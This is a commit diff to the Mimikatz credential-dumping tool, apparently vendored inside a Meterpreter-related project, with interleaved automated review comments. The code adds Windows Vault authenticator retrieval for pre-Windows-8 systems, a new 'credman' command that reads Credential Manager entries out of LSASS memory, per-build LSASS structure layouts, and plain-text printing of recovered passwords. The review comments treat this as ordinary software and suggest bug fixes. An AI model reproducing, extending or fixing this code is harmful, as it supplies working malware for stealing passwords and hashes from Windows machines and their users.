Update to Mimikatz commit be342ebba59fe9f940a26cbb0e7fab5ee7b6f56b
This commit is contained in:
parent
8a35e04c7b
commit
2d37f71fd7
@ -14,6 +14,7 @@ PVAULTENUMERATEITEMS VaultEnumerateItems = NULL;
|
||||
PVAULTCLOSEVAULT VaultCloseVault = NULL;
|
||||
PVAULTFREE VaultFree = NULL;
|
||||
|
||||
PVAULTGETITEM7 VaultGetItem7 = NULL;
|
||||
PVAULTGETITEM8 VaultGetItem8 = NULL;
|
||||
|
||||
BOOL isVaultInit = FALSE;
|
||||
@ -70,7 +71,7 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
|
||||
LPGUID vaults;
|
||||
HANDLE hVault;
|
||||
PVOID items;
|
||||
PVAULT_ITEM_7 items7;
|
||||
PVAULT_ITEM_7 items7, pItem7;
|
||||
PVAULT_ITEM_8 items8, pItem8;
|
||||
NTSTATUS status;
|
||||
|
||||
@ -91,10 +92,34 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
|
||||
kprintf(L"\tItems (%u)\n", cbItems);
|
||||
for(j = 0; j < cbItems; j++)
|
||||
{
|
||||
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8)
|
||||
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8) // to fix !
|
||||
{
|
||||
items7 = (PVAULT_ITEM_7) items;
|
||||
// todo
|
||||
kprintf(L"\t %2u.\t%s\n", j, items7[j].FriendlyName);
|
||||
kprintf(L"\t\tType : "); kull_m_string_displayGUID(&items7[j].SchemaId); kprintf(L"\n");
|
||||
kprintf(L"\t\tLastWritten : "); kull_m_string_displayLocalFileTime(&items7[j].LastWritten); kprintf(L"\n");
|
||||
kprintf(L"\t\tFlags : %08x\n", items7[j].Flags);
|
||||
|
||||
kprintf(L"\t\tRessource : "); kuhl_m_vault_list_descItemData(items7[j].Ressource); kprintf(L"\n");
|
||||
kprintf(L"\t\tIdentity : "); kuhl_m_vault_list_descItemData(items7[j].Identity); kprintf(L"\n");
|
||||
kprintf(L"\t\tAuthenticator : "); kuhl_m_vault_list_descItemData(items7[j].Authenticator); kprintf(L"\n");
|
||||
|
||||
for(k = 0; k < items7[j].cbProperties; k++)
|
||||
{
|
||||
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items7[j].Properties + k); kprintf(L"\n");
|
||||
}
|
||||
|
||||
pItem7 = NULL;
|
||||
system("pause");
|
||||
status = VaultGetItem7(hVault, &items7[j].SchemaId, items7[j].Ressource, items7[j].Identity, NULL, 0, &pItem7);
|
||||
|
||||
kprintf(L"\t\t*Authenticator* : ");
|
||||
if(status == STATUS_SUCCESS)
|
||||
kuhl_m_vault_list_descItemData(pItem7->Authenticator);
|
||||
else
|
||||
PRINT_ERROR(L"VaultGetItem7 : %08x", status);
|
||||
kprintf(L"\n");
|
||||
;
|
||||
}
|
||||
else
|
||||
{
|
||||
@ -112,7 +137,7 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
|
||||
|
||||
for(k = 0; k < items8[j].cbProperties; k++)
|
||||
{
|
||||
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items8[j].Properties[k]); kprintf(L"\n");
|
||||
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items8[j].Properties + k); kprintf(L"\n");
|
||||
}
|
||||
|
||||
pItem8 = NULL;
|
||||
@ -222,18 +247,18 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties[0])
|
||||
if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties + 0)
|
||||
{
|
||||
switch(pGuidString->guid.Data1)
|
||||
{
|
||||
case 0x0b2e033f5: // pin
|
||||
if(enumItem8->Properties[0]->Type == ElementType_UnsignedShort)
|
||||
kprintf(L"\t\tPIN Code : %04hu\n", enumItem8->Properties[0]->data.UnsignedShort);
|
||||
if((enumItem8->Properties + 0)->Type == ElementType_UnsignedShort)
|
||||
kprintf(L"\t\tPIN Code : %04hu\n", (enumItem8->Properties + 0)->data.UnsignedShort);
|
||||
break;
|
||||
case 0x0b4b8a12b: // picture
|
||||
if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
|
||||
if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
|
||||
{
|
||||
pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) enumItem8->Properties[0]->data.ByteArray.Value;
|
||||
pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
|
||||
if(bgPath)
|
||||
{
|
||||
kprintf(L"\t\tBackground path : %s\n", bgPath);
|
||||
@ -263,9 +288,9 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
|
||||
}
|
||||
break;
|
||||
case 0x0fec87291: // biometric
|
||||
if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
|
||||
if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
|
||||
{
|
||||
bElements = (PVAULT_BIOMETRIC_ELEMENT) enumItem8->Properties[0]->data.ByteArray.Value;
|
||||
bElements = (PVAULT_BIOMETRIC_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
|
||||
bufferStart = (PWCHAR) ((PBYTE) bElements + bElements->headersize);
|
||||
kprintf(L"\t\tProperty : ");
|
||||
if(bElements->domainnameLength > 1)
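Review bot: `system("pause");` placed just before the `VaultGetItem7(...)` call in the pre-Windows-8 branch of `kuhl_m_vault_list` (hunk `@ -91,10 +92,34`) is a debugging stop: it runs cmd.exe's `pause` and blocks the calling thread until a key is pressed, and in a Meterpreter-hosted build there is no console to satisfy it, so the line must be deleted, together with the stray `;` statement after the trailing `kprintf(L"\n");`. The `// to fix !` on `if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8)` says the branch is unfinished, and nothing in the hunk passes `pItem7` to `VaultFree` after a successful `VaultGetItem7`, so it presumably leaks; confirm against the rest of the function. In the later `@ -222,18 +247,18` hunk the rewritten test `if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties + 0)` has a tautological third clause (a non-NULL pointer plus zero is non-NULL), so the former NULL check on the first property is gone; drop the clause to `if(enumItem8->Properties && (enumItem8->cbProperties > 0))` rather than keep a condition that looks like a check and is not one.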
|
||||
|
@ -139,7 +139,7 @@ typedef struct _VAULT_ITEM_7 {
|
||||
FILETIME LastWritten;
|
||||
DWORD Flags;
|
||||
DWORD cbProperties;
|
||||
PVAULT_ITEM_DATA Properties[ANYSIZE_ARRAY];
|
||||
PVAULT_ITEM_DATA Properties;
|
||||
} VAULT_ITEM_7, *PVAULT_ITEM_7;
|
||||
|
||||
typedef struct _VAULT_ITEM_8 {
|
||||
@ -152,7 +152,7 @@ typedef struct _VAULT_ITEM_8 {
|
||||
FILETIME LastWritten;
|
||||
DWORD Flags;
|
||||
DWORD cbProperties;
|
||||
PVAULT_ITEM_DATA Properties[ANYSIZE_ARRAY];
|
||||
PVAULT_ITEM_DATA Properties;
|
||||
} VAULT_ITEM_8, *PVAULT_ITEM_8;
|
||||
|
||||
typedef struct _VAULT_ITEM_TYPE {
|
||||
@ -173,4 +173,5 @@ typedef NTSTATUS (WINAPI * PVAULTGETINFORMATION) (HANDLE vault, DWORD unk0, PVAU
|
||||
typedef NTSTATUS (WINAPI * PVAULTENUMERATEITEMS) (HANDLE vault, DWORD unk0, PDWORD cbItems, PVOID * items);
|
||||
typedef NTSTATUS (WINAPI * PVAULTENUMERATEITEMTYPES) (HANDLE vault, DWORD unk0, PDWORD cbItemTypes, PVAULT_ITEM_TYPE * itemTypes);
|
||||
|
||||
typedef NTSTATUS (WINAPI * PVAULTGETITEM7) (HANDLE vault, LPGUID SchemaId, PVAULT_ITEM_DATA Resource, PVAULT_ITEM_DATA Identity, HWND hWnd, DWORD Flags, PVAULT_ITEM_7 * pItem);
|
||||
typedef NTSTATUS (WINAPI * PVAULTGETITEM8) (HANDLE vault, LPGUID SchemaId, PVAULT_ITEM_DATA Resource, PVAULT_ITEM_DATA Identity, PVAULT_ITEM_DATA PackageSid, HWND hWnd, DWORD Flags, PVAULT_ITEM_8 * pItem);
|
||||
|
@ -76,10 +76,11 @@ typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
|
||||
ULONG Session;
|
||||
PVOID pCredentials;
|
||||
PSID pSid;
|
||||
PVOID pCredentialManager;
|
||||
} KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA;
|
||||
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_EXTERNAL) (IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain, IN CONST PUNICODE_STRING password, IN CONST PBYTE lm, IN CONST PBYTE ntlm, IN OUT LPVOID pvData);
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_ENUM_LOGONDATA) (IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_ENUM_LOGONDATA) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
typedef BOOL (CALLBACK * PKUHL_M_SEKURLSA_ENUM) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_PACKAGE {
|
||||
|
@ -22,6 +22,7 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
|
||||
{kuhl_m_sekurlsa_msv_pth, L"pth", L"Pass-the-hash"},
|
||||
{kuhl_m_sekurlsa_kerberos_tickets, L"tickets", L"List Kerberos tickets"},
|
||||
{kuhl_m_sekurlsa_dpapi, L"dpapi", L"List Cached MasterKeys"},
|
||||
{kuhl_m_sekurlsa_credman, L"credman", L"List Credentials Manager"},
|
||||
};
|
||||
|
||||
const KUHL_M kuhl_m_sekurlsa = {
|
||||
@ -37,13 +38,16 @@ const PKUHL_M_SEKURLSA_PACKAGE lsassPackages[] = {
|
||||
&kuhl_m_sekurlsa_kerberos_package,
|
||||
&kuhl_m_sekurlsa_ssp_package,
|
||||
&kuhl_m_sekurlsa_dpapi_svc_package,
|
||||
&kuhl_m_sekurlsa_credman_package,
|
||||
};
|
||||
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
||||
{sizeof(KIWI_MSV1_0_LIST_5) , FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_6) , FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid)}
|
||||
{sizeof(KIWI_MSV1_0_LIST_51), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
|
||||
const KUHL_M_SEKURLSA_LOCAL_HELPER lsassLocalHelpers[] = {
|
||||
@ -301,14 +305,18 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
sessionData.cLsass = &cLsass;
|
||||
sessionData.lsassLocalHelper = lsassLocalHelper;
|
||||
|
||||
if(cLsass.osContext.MajorVersion < 6)
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)
|
||||
helper = &lsassEnumHelpers[0];
|
||||
else if(cLsass.osContext.MinorVersion < 2)
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA)
|
||||
helper = &lsassEnumHelpers[1];
|
||||
else if(cLsass.osContext.MinorVersion < 3)
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7)
|
||||
helper = &lsassEnumHelpers[2];
|
||||
else
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[3];
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[4];
|
||||
else
|
||||
helper = &lsassEnumHelpers[5];
|
||||
|
||||
securityStruct.hMemory = cLsass.hLsassMem;
|
||||
securityStruct.address = LogonSessionListCount;
|
||||
@ -384,7 +392,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
|
||||
if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
|
||||
{
|
||||
kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);
|
||||
pLsassData->lsassPackages[i]->CredsForLUIDFunc(&cLsass, pData->LogonId, pData->pCredentials, pLsassData->externalCallback, pLsassData->externalCallbackData);
|
||||
pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData, pLsassData->externalCallback, pLsassData->externalCallbackData);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
@ -516,9 +524,13 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
, username, domain);
|
||||
|
||||
if(!password || kull_m_string_suspectUnicodeString(password))
|
||||
kprintf(L"%wZ", password);
|
||||
else
|
||||
kull_m_string_wprintf_hex(password->Buffer, password->Length, 1);
|
||||
{
|
||||
if((flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS) && password)
|
||||
kprintf(L"%.*s", password->Length / sizeof(wchar_t), password->Buffer);
|
||||
else
|
||||
kprintf(L"%wZ", password);
|
||||
}
|
||||
else kull_m_string_wprintf_hex(password->Buffer, password->Length, 1);
|
||||
}
|
||||
|
||||
LocalFree(mesCreds->UserName.Buffer);
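Review bot: On the new side of the helper-selection hunk (`@ -301,14 +305,18`) the build-number tests from `if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)` through `if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)` are rendered as independent `if` statements with an `else` only on the last one; if the source really has no `else` between them, each later test overwrites the earlier choice and every build below 8.1 ends up with `&lsassEnumHelpers[4]`, so from the second test on the lines should read `else if(cLsass.osContext.BuildNumber < ...)` (if the page merely dropped the `else` tokens, disregard this). Separately, in the `@ -516,9 +524,13` hunk, `kprintf(L"%.*s", password->Length / sizeof(wchar_t), password->Buffer);` passes a `size_t` where `%.*s` reads an `int` precision, which is undefined per the C standard even though it happens to work on little-endian MSVC targets; write `(int)(password->Length / sizeof(wchar_t))`.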
|
||||
|
@ -24,6 +24,7 @@
|
||||
#include "packages/kuhl_m_sekurlsa_tspkg.h"
|
||||
#include "packages/kuhl_m_sekurlsa_wdigest.h"
|
||||
#include "packages/kuhl_m_sekurlsa_dpapi.h"
|
||||
#include "packages/kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
//#include "kerberos/kuhl_m_kerberos_ticket.h"
|
||||
|
||||
@ -36,6 +37,7 @@
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT 0x10000000
|
||||
@ -70,13 +72,14 @@ NTSTATUS kuhl_m_sekurlsa_minidump(int argc, wchar_t * argv[]);
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
|
||||
SIZE_T tailleStruct;
|
||||
LONG offsetToLuid;
|
||||
LONG offsetToLogonType;
|
||||
LONG offsetToSession;
|
||||
LONG offsetToUsername;
|
||||
LONG offsetToDomain;
|
||||
LONG offsetToCredentials;
|
||||
LONG offsetToPSid;
|
||||
ULONG offsetToLuid;
|
||||
ULONG offsetToLogonType;
|
||||
ULONG offsetToSession;
|
||||
ULONG offsetToUsername;
|
||||
ULONG offsetToDomain;
|
||||
ULONG offsetToCredentials;
|
||||
ULONG offsetToPSid;
|
||||
ULONG offsetToCredentialManager;
|
||||
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA {
|
||||
|
@ -35,9 +35,9 @@ typedef struct _KIWI_MSV1_0_CREDENTIALS {
|
||||
PKIWI_MSV1_0_PRIMARY_CREDENTIALS PrimaryCredentials;
|
||||
} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_5 {
|
||||
struct _KIWI_MSV1_0_LIST_5 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_5 *Blink;
|
||||
typedef struct _KIWI_MSV1_0_LIST_51 {
|
||||
struct _KIWI_MSV1_0_LIST_51 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_51 *Blink;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
@ -49,9 +49,36 @@ typedef struct _KIWI_MSV1_0_LIST_5 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
ULONG unk23;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_51, *PKIWI_MSV1_0_LIST_51;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
typedef struct _KIWI_MSV1_0_LIST_52 {
|
||||
struct _KIWI_MSV1_0_LIST_52 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_52 *Blink;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk0;
|
||||
PVOID unk1;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_52, *PKIWI_MSV1_0_LIST_52;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_60 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
@ -80,7 +107,49 @@ typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
ULONG unk23;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_60, *PKIWI_MSV1_0_LIST_60;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
@ -105,8 +174,7 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -114,6 +182,18 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_62, *PKIWI_MSV1_0_LIST_62;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
@ -140,8 +220,7 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -149,4 +228,16 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_63, *PKIWI_MSV1_0_LIST_63;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_63, *PKIWI_MSV1_0_LIST_63;
